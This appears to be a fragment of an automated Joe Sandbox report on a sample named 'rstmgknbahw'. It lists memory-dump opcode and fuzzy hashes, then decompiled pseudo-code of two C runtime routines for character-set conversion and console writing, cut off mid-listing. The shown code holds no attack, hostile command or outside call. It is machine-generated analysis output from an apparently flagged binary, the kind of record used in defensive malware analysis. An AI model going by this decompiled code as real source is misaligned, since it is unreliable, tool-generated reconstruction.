                          • Instruction Fuzzy Hash: 8D119E30A04249CFDB269F66C9507BE7BBABB44700F1048BAC502A6744EB316942DF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 01c141564f09033f91f390fa9c4d7ffb1320982d2747a21b97d04f9712ed0d6c
                          • Instruction ID: 754e0f0938a1bb5577bebec5f0b9394340af177a07b28546df21e0897cdea1d9
                          • Opcode Fuzzy Hash: 01c141564f09033f91f390fa9c4d7ffb1320982d2747a21b97d04f9712ed0d6c
                          • Instruction Fuzzy Hash: 4C112B3514D7C08FC717CB14C990B55BFB5AB46318F288AEED9894B6A3C73A9806CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 87e6452b6a278cb9998121899ebbc4541fd07c5cbe4044ec5f1244251b5ff67a
                          • Instruction ID: e2ccb36ca6d8f02c82c7215b1d8ad36300551b430e20ca9f4c85b485af80db77
                          • Opcode Fuzzy Hash: 87e6452b6a278cb9998121899ebbc4541fd07c5cbe4044ec5f1244251b5ff67a
                          • Instruction Fuzzy Hash: 8DF0F93154C7809FC3158B15AC61992BFA8EF81330B1881EBD849CB613E53AE908CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07552edfddaec59e06a51c1bd0e2b882c618d17ce383f640be94d493c2869ed0
                          • Instruction ID: 22b9574b125e5aaa5bebdd0a612b5f48667c8966907181b359869ffaf5d88ee0
                          • Opcode Fuzzy Hash: 07552edfddaec59e06a51c1bd0e2b882c618d17ce383f640be94d493c2869ed0
                          • Instruction Fuzzy Hash: F401D67550D7806FD7128B06DC40862FFA8EB86270708C49FEC49CB612D229A808CB72
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 66f914415bd62fcc11da5018ce96f0c8e8f9929aed1db6fa28431e23b459183d
                          • Instruction ID: a86da9b59432d6c2cfe93a06d0f327fab017d16f3e6dd849c26d25cd44112712
                          • Opcode Fuzzy Hash: 66f914415bd62fcc11da5018ce96f0c8e8f9929aed1db6fa28431e23b459183d
                          • Instruction Fuzzy Hash: CCF0B4313005244BCB09767E941277F62CB9BC9A58764853EF106EB384DDB8AC0763DA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 18dbcbbfc935c15e07047d4e4559e839ba514e62d4161ab4bed24f5dabf4da6f
                          • Instruction ID: 7c4a6bb3dbbed08bb1d244d8b53f7dfa242978df48b2b08f569abe166da16e37
                          • Opcode Fuzzy Hash: 18dbcbbfc935c15e07047d4e4559e839ba514e62d4161ab4bed24f5dabf4da6f
                          • Instruction Fuzzy Hash: 83016D30304110CFC604A72AD458979B7EBBFC5700B2044BAE406CB366DF75AC089782
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ddc56b443f61110a6cece989441f78ebb9d47699a47f92e44d31eeb6ea6b36c
                          • Instruction ID: 84b8c852c9417896695badfc0b1077e3f82b0cc3cb608b43acaeeab0b4fd2a58
                          • Opcode Fuzzy Hash: 1ddc56b443f61110a6cece989441f78ebb9d47699a47f92e44d31eeb6ea6b36c
                          • Instruction Fuzzy Hash: 68E05532F242388B9B015EF799081BFBBEA9780250F0008338B0793200E9F0A80662D1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 60c8b34fb35678e1fb60f90889e0e3934e4b0a967459bc42eed4f85b7be4048e
                          • Instruction ID: 3e7cc4009da01febcf00ce876e7e5e9439b3371c09d0d465689233af896f6702
                          • Opcode Fuzzy Hash: 60c8b34fb35678e1fb60f90889e0e3934e4b0a967459bc42eed4f85b7be4048e
                          • Instruction Fuzzy Hash: 58F05E31B04518CFDB51EE9AE4846BCB773FBC0310B648666D81ADB249DF34AD418782
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 98aa427736791220dc25ac0ef26420d988ea76a667d22f4e64fdc33c774cceab
                          • Instruction ID: b3554dbf4bd6e045713b38d8cb90d099a4b3b644844ef6f0af736be36802cec8
                          • Opcode Fuzzy Hash: 98aa427736791220dc25ac0ef26420d988ea76a667d22f4e64fdc33c774cceab
                          • Instruction Fuzzy Hash: 50F02730B193648FD7024FB2495477F7FE75B42200B1609AB8E439B256E9B8EC06A261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
                          • Instruction ID: b6478a4889dcca41684fb4e286bd10e981cf634a8187707cf4867667736b9b8c
                          • Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
                          • Instruction Fuzzy Hash: C6F0FB35144644DFC606CF44D540B65FBA6EB89718F24C6A9E9490B752C73BD813DA81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.734676409.0000000000AB0000.00000040.00000040.sdmp, Offset: 00AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_ab0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3cf41980a7af441adeaa25c99d31e87cc7681d8f9cff14e80c94ec968d86b0d2
                          • Instruction ID: 893d08fe10ac6cc491346c77bc9a2a06d8f84acc51ebc1c981c614fd9b2f0682
                          • Opcode Fuzzy Hash: 3cf41980a7af441adeaa25c99d31e87cc7681d8f9cff14e80c94ec968d86b0d2
                          • Instruction Fuzzy Hash: E1E092766447005BD650CF0AEC81452FBD4EB84630B18C07FDC0D8B700E63AF508CEA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f04b65be02425b337a2264584ca8d9d68b171e2b65ec115eb534ae1da40c3a6
                          • Instruction ID: 7ed1ab72bacaab4c6c15d7c263a755f92824f7116768894d6e3ccb0548a4a3b0
                          • Opcode Fuzzy Hash: 8f04b65be02425b337a2264584ca8d9d68b171e2b65ec115eb534ae1da40c3a6
                          • Instruction Fuzzy Hash: B3D05E3428C2C09ED307079619607B03F2ADB1B611F180EE79ACB490F3A004F057A222
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 966b02a6a926005ce475063e4ed15c8d5291622f07b2611463b3caebab8c75c0
                          • Instruction ID: a5483ca7e0127fcf0da1b5702b4776c0d4bdb0fcde7ff03f3082f4daf06ec236
                          • Opcode Fuzzy Hash: 966b02a6a926005ce475063e4ed15c8d5291622f07b2611463b3caebab8c75c0
                          • Instruction Fuzzy Hash: 07E05B3434C740CFC352DB65A5E45D23BF1EE426103458D9AD4E647666C724FC0BD750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9d397034200d54692503e7d18efb6e93baecdc31a3e3e6551cbf9823e3ce30f5
                          • Instruction ID: c5b662af472d137560961333cbe28225ee7f2b642cdca709b3d13c39a89bbd14
                          • Opcode Fuzzy Hash: 9d397034200d54692503e7d18efb6e93baecdc31a3e3e6551cbf9823e3ce30f5
                          • Instruction Fuzzy Hash: EDD0A7B25492D0CFC29647B129191F47F72DE931047188DABD8405983195717653AA11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5c12deef6cc759294ca3e836b009a79d4e7404e2614819b7752f8d2dc239b543
                          • Instruction ID: fbb4ce5a29300282e844316783095b2a7e3ae44c4ca3ae8cc0e35d38c857c213
                          • Opcode Fuzzy Hash: 5c12deef6cc759294ca3e836b009a79d4e7404e2614819b7752f8d2dc239b543
                          • Instruction Fuzzy Hash: ECD05B32701300CFD7057770E52911C3B61EF8526674449BFD4268ABE0DE3AC495CA04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.734600924.0000000000A82000.00000040.00000001.sdmp, Offset: 00A82000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_a82000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e44e742bbfeddb7f96924173d2b644d209f20612aba119046198be8ca327b01b
                          • Instruction ID: 1ee307cf787418dce05ef33d0353b7f3cb8677eb4a86782512447d1166f3e595
                          • Opcode Fuzzy Hash: e44e742bbfeddb7f96924173d2b644d209f20612aba119046198be8ca327b01b
                          • Instruction Fuzzy Hash: 5AD05E79244A914FD3269B1CC1A4BA53BD4AB51B04F4684FAA8408B6A7C768DA81D310
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 033a24ea93443da93e9e39c74cb8eb2982c1b0d7ecb9c86f5154a6a2c8879a07
                          • Instruction ID: f1a55b635f19dfa3badcf1ffa9fadba85256cb151348503d16676917522ab044
                          • Opcode Fuzzy Hash: 033a24ea93443da93e9e39c74cb8eb2982c1b0d7ecb9c86f5154a6a2c8879a07
                          • Instruction Fuzzy Hash: 9DD01231311304CFCB09BBB0E41D41C37A5AF8824A740087DD80687B50EE3AE841CA04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e655fae6281fc29c8821b82b10253d38b67b64a3040570ee2d6bfaecd3f8557c
                          • Instruction ID: 7bc3ff2bd2ef8ad5d49c0cda661b55123d755c24b425c9fa218f1402ab409d1c
                          • Opcode Fuzzy Hash: e655fae6281fc29c8821b82b10253d38b67b64a3040570ee2d6bfaecd3f8557c
                          • Instruction Fuzzy Hash: B6C02B30249234CFC25597B22C0553D721A56C0708714CD36A401100309DB27452A821
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000006.00000002.735187582.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_49e0000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4a9683d8a07ae299487206a149b61e73b1227364d8a70a57d4879eb78410759
                          • Instruction ID: d1813964e98be40abcfc0cf55ccec07907487f23a4745347fb09de7f4f99cc2f
                          • Opcode Fuzzy Hash: b4a9683d8a07ae299487206a149b61e73b1227364d8a70a57d4879eb78410759
                          • Instruction Fuzzy Hash: D2B012303043091B27809BF72C0CB23738C564040535400BA980CC4000F900E0902141
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                          				signed int _v8;
                          				int _v12;
                          				void* _v24;
                          				signed int _t49;
                          				signed int _t54;
                          				int _t56;
                          				signed int _t58;
                          				short* _t60;
                          				signed int _t64;
                          				short* _t68;
                          				int _t76;
                          				short* _t79;
                          				signed int _t85;
                          				signed int _t88;
                          				void* _t93;
                          				void* _t94;
                          				int _t96;
                          				short* _t99;
                          				int _t101;
                          				int _t103;
                          				signed int _t104;
                          				short* _t105;
                          				void* _t108;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t49 =  *0x412014; // 0xc066fb75
                          				_v8 = _t49 ^ _t104;
                          				_t101 = _a20;
                          				if(_t101 > 0) {
                          					_t76 = E004080D8(_a16, _t101);
                          					_t108 = _t76 - _t101;
                          					_t4 = _t76 + 1; // 0x1
                          					_t101 = _t4;
                          					if(_t108 >= 0) {
                          						_t101 = _t76;
                          					}
                          				}
                          				_t96 = _a32;
                          				if(_t96 == 0) {
                          					_t96 =  *( *_a4 + 8);
                          					_a32 = _t96;
                          				}
                          				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                          				_v12 = _t54;
                          				if(_t54 == 0) {
                          					L38:
                          					E004018CC();
                          					return _t54;
                          				} else {
                          					_t93 = _t54 + _t54;
                          					_t83 = _t93 + 8;
                          					asm("sbb eax, eax");
                          					if((_t93 + 0x00000008 & _t54) == 0) {
                          						_t79 = 0;
                          						__eflags = 0;
                          						L14:
                          						if(_t79 == 0) {
                          							L36:
                          							_t103 = 0;
                          							L37:
                          							E004063D5(_t79);
                          							_t54 = _t103;
                          							goto L38;
                          						}
                          						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                          						_t119 = _t56;
                          						if(_t56 == 0) {
                          							goto L36;
                          						}
                          						_t98 = _v12;
                          						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                          						_t103 = _t58;
                          						if(_t103 == 0) {
                          							goto L36;
                          						}
                          						if((_a12 & 0x00000400) == 0) {
                          							_t94 = _t103 + _t103;
                          							_t85 = _t94 + 8;
                          							__eflags = _t94 - _t85;
                          							asm("sbb eax, eax");
                          							__eflags = _t85 & _t58;
                          							if((_t85 & _t58) == 0) {
                          								_t99 = 0;
                          								__eflags = 0;
                          								L30:
                          								__eflags = _t99;
                          								if(__eflags == 0) {
                          									L35:
                          									E004063D5(_t99);
                          									goto L36;
                          								}
                          								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                          								__eflags = _t60;
                          								if(_t60 == 0) {
                          									goto L35;
                          								}
                          								_push(0);
                          								_push(0);
                          								__eflags = _a28;
                          								if(_a28 != 0) {
                          									_push(_a28);
                          									_push(_a24);
                          								} else {
                          									_push(0);
                          									_push(0);
                          								}
                          								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                          								__eflags = _t103;
                          								if(_t103 != 0) {
                          									E004063D5(_t99);
                          									goto L37;
                          								} else {
                          									goto L35;
                          								}
                          							}
                          							_t88 = _t94 + 8;
                          							__eflags = _t94 - _t88;
                          							asm("sbb eax, eax");
                          							_t64 = _t58 & _t88;
                          							_t85 = _t94 + 8;
                          							__eflags = _t64 - 0x400;
                          							if(_t64 > 0x400) {
                          								__eflags = _t94 - _t85;
                          								asm("sbb eax, eax");
                          								_t99 = E00403E3D(_t85, _t64 & _t85);
                          								_pop(_t85);
                          								__eflags = _t99;
                          								if(_t99 == 0) {
                          									goto L35;
                          								}
                          								 *_t99 = 0xdddd;
                          								L28:
                          								_t99 =  &(_t99[4]);
                          								goto L30;
                          							}
                          							__eflags = _t94 - _t85;
                          							asm("sbb eax, eax");
                          							E004018E0();
                          							_t99 = _t105;
                          							__eflags = _t99;
                          							if(_t99 == 0) {
                          								goto L35;
                          							}
                          							 *_t99 = 0xcccc;
                          							goto L28;
                          						}
                          						_t68 = _a28;
                          						if(_t68 == 0) {
                          							goto L37;
                          						}
                          						_t123 = _t103 - _t68;
                          						if(_t103 > _t68) {
                          							goto L36;
                          						}
                          						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                          						if(_t103 != 0) {
                          							goto L37;
                          						}
                          						goto L36;
                          					}
                          					asm("sbb eax, eax");
                          					_t70 = _t54 & _t93 + 0x00000008;
                          					_t83 = _t93 + 8;
                          					if((_t54 & _t93 + 0x00000008) > 0x400) {
                          						__eflags = _t93 - _t83;
                          						asm("sbb eax, eax");
                          						_t79 = E00403E3D(_t83, _t70 & _t83);
                          						_pop(_t83);
                          						__eflags = _t79;
                          						if(__eflags == 0) {
                          							goto L36;
                          						}
                          						 *_t79 = 0xdddd;
                          						L12:
                          						_t79 =  &(_t79[4]);
                          						goto L14;
                          					}
                          					asm("sbb eax, eax");
                          					E004018E0();
                          					_t79 = _t105;
                          					if(_t79 == 0) {
                          						goto L36;
                          					}
                          					 *_t79 = 0xcccc;
                          					goto L12;
                          				}
                          			}


























                          0x004078d4
                          0x004078d5
                          0x004078d6
                          0x004078dd
                          0x004078e2
                          0x004078e8
                          0x004078ee
                          0x004078f4
                          0x004078f7
                          0x004078f7
                          0x004078fa
                          0x004078fc
                          0x004078fc
                          0x004078fa
                          0x004078fe
                          0x00407903
                          0x0040790a
                          0x0040790d
                          0x0040790d
                          0x00407929
                          0x0040792f
                          0x00407934
                          0x00407ac7
                          0x00407ad2
                          0x00407ada
                          0x0040793a
                          0x0040793a
                          0x0040793d
                          0x00407942
                          0x00407946
                          0x0040799a
                          0x0040799a
                          0x0040799c
                          0x0040799e
                          0x00407abc
                          0x00407abc
                          0x00407abe
                          0x00407abf
                          0x00407ac5
                          0x00000000
                          0x00407ac5
                          0x004079af
                          0x004079b5
                          0x004079b7
                          0x00000000
                          0x00000000
                          0x004079bd
                          0x004079cf
                          0x004079d4
                          0x004079d8
                          0x00000000
                          0x00000000
                          0x004079e5
                          0x00407a1f
                          0x00407a22
                          0x00407a25
                          0x00407a27
                          0x00407a29
                          0x00407a2b
                          0x00407a77
                          0x00407a77
                          0x00407a79
                          0x00407a79
                          0x00407a7b
                          0x00407ab5
                          0x00407ab6
                          0x00000000
                          0x00407abb
                          0x00407a8f
                          0x00407a94
                          0x00407a96
                          0x00000000
                          0x00000000
                          0x00407a9a
                          0x00407a9b
                          0x00407a9c
                          0x00407a9f
                          0x00407adb
                          0x00407ade
                          0x00407aa1
                          0x00407aa1
                          0x00407aa2
                          0x00407aa2
                          0x00407aaf
                          0x00407ab1
                          0x00407ab3
                          0x00407ae4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00407ab3
                          0x00407a2d
                          0x00407a30
                          0x00407a32
                          0x00407a34
                          0x00407a36
                          0x00407a39
                          0x00407a3e
                          0x00407a59
                          0x00407a5b
                          0x00407a65
                          0x00407a67
                          0x00407a68
                          0x00407a6a
                          0x00000000
                          0x00000000
                          0x00407a6c
                          0x00407a72
                          0x00407a72
                          0x00000000
                          0x00407a72
                          0x00407a40
                          0x00407a42
                          0x00407a46
                          0x00407a4b
                          0x00407a4d
                          0x00407a4f
                          0x00000000
                          0x00000000
                          0x00407a51
                          0x00000000
                          0x00407a51
                          0x004079e7
                          0x004079ec
                          0x00000000
                          0x00000000
                          0x004079f2
                          0x004079f4
                          0x00000000
                          0x00000000
                          0x00407a10
                          0x00407a14
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00407a1a
                          0x0040794d
                          0x0040794f
                          0x00407951
                          0x00407959
                          0x00407978
                          0x0040797a
                          0x00407984
                          0x00407986
                          0x00407987
                          0x00407989
                          0x00000000
                          0x00000000
                          0x0040798f
                          0x00407995
                          0x00407995
                          0x00000000
                          0x00407995
                          0x0040795d
                          0x00407961
                          0x00407966
                          0x0040796a
                          0x00000000
                          0x00000000
                          0x00407970
                          0x00000000
                          0x00407970

                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                          • __alloca_probe_16.LIBCMT ref: 00407961
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                          • __alloca_probe_16.LIBCMT ref: 00407A46
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                          • __freea.LIBCMT ref: 00407AB6
                            • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                          • __freea.LIBCMT ref: 00407ABF
                          • __freea.LIBCMT ref: 00407AE4
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                          • String ID:
                          • API String ID: 3864826663-0
                          • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                          • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                          • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                          • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                          				signed int _v8;
                          				signed char _v15;
                          				char _v16;
                          				void _v24;
                          				short _v28;
                          				char _v31;
                          				void _v32;
                          				long _v36;
                          				intOrPtr _v40;
                          				void* _v44;
                          				signed int _v48;
                          				signed char* _v52;
                          				long _v56;
                          				int _v60;
                          				void* __ebx;
                          				signed int _t78;
                          				signed int _t80;
                          				int _t86;
                          				void* _t93;
                          				long _t96;
                          				void _t104;
                          				void* _t111;
                          				signed int _t115;
                          				signed int _t118;
                          				signed char _t123;
                          				signed char _t128;
                          				intOrPtr _t129;
                          				signed int _t131;
                          				signed char* _t133;
                          				intOrPtr* _t136;
                          				signed int _t138;
                          				void* _t139;
                          
                          				_t78 =  *0x412014; // 0xc066fb75
                          				_v8 = _t78 ^ _t138;
                          				_t80 = _a8;
                          				_t118 = _t80 >> 6;
                          				_t115 = (_t80 & 0x0000003f) * 0x30;
                          				_t133 = _a12;
                          				_v52 = _t133;
                          				_v48 = _t118;
                          				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                          				_v40 = _a16 + _t133;
                          				_t86 = GetConsoleCP();
                          				_t136 = _a4;
                          				_v60 = _t86;
                          				 *_t136 = 0;
                          				 *((intOrPtr*)(_t136 + 4)) = 0;
                          				 *((intOrPtr*)(_t136 + 8)) = 0;
                          				while(_t133 < _v40) {
                          					_v28 = 0;
                          					_v31 =  *_t133;
                          					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                          					_t123 =  *(_t129 + _t115 + 0x2d);
                          					if((_t123 & 0x00000004) == 0) {
                          						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                          							_push(1);
                          							_push(_t133);
                          							goto L8;
                          						} else {
                          							if(_t133 >= _v40) {
                          								_t131 = _v48;
                          								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                          								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                          								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                          							} else {
                          								_t111 = E00407222( &_v28, _t133, 2);
                          								_t139 = _t139 + 0xc;
                          								if(_t111 != 0xffffffff) {
                          									_t133 =  &(_t133[1]);
                          									goto L9;
                          								}
                          							}
                          						}
                          					} else {
                          						_t128 = _t123 & 0x000000fb;
                          						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                          						_push(2);
                          						_v15 = _t128;
                          						 *(_t129 + _t115 + 0x2d) = _t128;
                          						_push( &_v16);
                          						L8:
                          						_push( &_v28);
                          						_t93 = E00407222();
                          						_t139 = _t139 + 0xc;
                          						if(_t93 != 0xffffffff) {
                          							L9:
                          							_t133 =  &(_t133[1]);
                          							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                          							_v56 = _t96;
                          							if(_t96 != 0) {
                          								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                          									L19:
                          									 *_t136 = GetLastError();
                          								} else {
                          									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                          									if(_v36 >= _v56) {
                          										if(_v31 != 0xa) {
                          											goto L16;
                          										} else {
                          											_t104 = 0xd;
                          											_v32 = _t104;
                          											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                          												goto L19;
                          											} else {
                          												if(_v36 >= 1) {
                          													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                          													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                          													goto L16;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          					goto L20;
                          					L16:
                          				}
                          				L20:
                          				E004018CC();
                          				return _t136;
                          			}



































                          0x0040822b
                          0x00408232
                          0x00408235
                          0x0040823d
                          0x00408241
                          0x0040824d
                          0x00408250
                          0x00408253
                          0x0040825a
                          0x00408262
                          0x00408265
                          0x0040826b
                          0x00408271
                          0x00408276
                          0x00408278
                          0x0040827b
                          0x00408280
                          0x0040828a
                          0x00408291
                          0x00408294
                          0x0040829b
                          0x004082a2
                          0x004082ce
                          0x004082f4
                          0x004082f6
                          0x00000000
                          0x004082d0
                          0x004082d3
                          0x0040839a
                          0x004083a6
                          0x004083b1
                          0x004083b6
                          0x004082d9
                          0x004082e0
